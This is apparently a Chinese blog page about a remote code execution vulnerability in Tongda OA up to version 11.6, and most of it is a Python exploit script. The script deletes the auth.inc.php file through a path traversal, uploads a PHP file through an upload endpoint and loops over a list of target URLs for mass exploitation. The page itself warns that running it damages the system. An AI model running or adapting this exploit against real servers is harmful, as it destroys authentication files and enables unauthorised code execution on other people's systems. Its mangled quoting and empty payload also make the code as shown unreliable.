通达oa_11.6_远程命令执行漏洞

# 通达oa 11.6 远程命令执行漏洞

============================

一、漏洞简介
————

此漏洞会导致网站程序严重损坏,并影响网站业务正常运行,请谨慎使用!

二、漏洞影响
————

通达oa \<= 11.6 三、复现过程 ------------ ### poc #! /usr/bin/env python3 # -*- coding: utf-8 -*- import requests #by Tommy,在原作者上修改而来,2020-8-19,通达OA 0 day漏洞利用 import sys version = sys.version_info if version < (3, 0): print('The current version is not supported, you need to use python3') sys.exit() def exploit(target): try: target=target payload='‘#无害检测
print(target,”[*]删除auth.inc.php…”)

url=target+”/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php”#删除auth.inc.php请求
requests.get(url=url,verify=False,timeout=10)
print(target,”[*]正在检查文件是否已删除…”)
url=target+”/inc/auth.inc.php”
page=requests.get(url=url,verify=False,timeout=10).text
#print(page)
if ‘No input file specified.’ not in page:
print(target,”[-]无法删除auth.inc.php文件”)
return 0
print(target,”[+]删除auth.inc.php成功”)
print(target,”[*]开始上传payload…”)
url=target+”/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./”
files = {‘FILE1’: (‘deconf.php’, payload)}
requests.post(url=url,files=files,verify=False,timeout=10)
url=target+”/_deconf.php”
page=requests.get(url=url,verify=False,timeout=10).text
if ‘No input file specified.’ not in page:
print(“[+]************************文件已存在,上传成功************************”)
if ‘8a8127bc83b94ad01414a7a3ea4b8′ in page:#如果执行过md5函数,才确认漏洞存在,减少误报
print(target,”************************代码执行成功,存在漏洞************************”)
print(target,”[+]URL:”,url)
else:
print(target,”[-]文件上传失败”)
except Exception as e:
print(target,e)
urls=’url.txt’
print(“[*]警告:利用此漏洞,会删除auth.inc.php,这可能会损坏OA系统”)
input(“按Enter继续”)
for url in open(urls,’r’,encoding=’utf-8′).read().split(‘\n’):
url=url.split()
url=url.split()
exploit(url[0])

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容